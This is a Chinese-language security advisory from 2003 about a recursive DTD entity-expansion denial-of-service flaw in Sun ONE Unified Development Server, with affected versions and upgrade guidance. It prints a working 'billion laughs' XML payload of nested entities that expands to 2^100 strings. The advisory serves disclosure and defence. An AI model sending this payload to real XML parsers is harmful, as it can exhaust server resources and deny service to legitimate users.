Sun ONE统一开发服务器递归文档类型定义漏洞发布时间:2003-01-15 更新时间:2003-01-15 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:6626 受影响系统 Sun ONE Integration Server EAI Edition 3.0详细描述 Sun ONE Unified Development Server (UDS)在处理递归文档类型定义时粗壮乃问题。 当文档包含这些结构类型上传后,由于XML1.0标准兼容解析器不正确处理,可导致消耗大量系统资源而产生拒绝服务。如DTD中包含递归定义实体"&x100;",下面的代码通过XML 1.0标准兼容解析器处理后会扩展成2^100个"hello"字符串,可消耗大量资源产生拒绝服务: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE foobar [ <!ENTITY x0 "hello"> <!ENTITY x1 "&x0;&x0;"> <!ENTITY x2 "&x1;&x1;"> <!ENTITY x3 "&x2;&x2;"> <!ENTITY x4 "&x3;&x3;"> ... <!ENTITY x98 "&x97;&x97;"> <!ENTITY x99 "&x98;&x98;"> <!ENTITY x100 "&x99;&x99;"> ]> <foobar>&x100;</foobar> 测试代码 见描述 解决方案 升级程序: Sun ONE Integration Server EAI Edition 3.0: Sun ONE Unified Development Server 5.0: Sun Upgrade ONE Unified Development Server 5.0.18 http://www.sun.com 相关信息 参考:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F49922 |
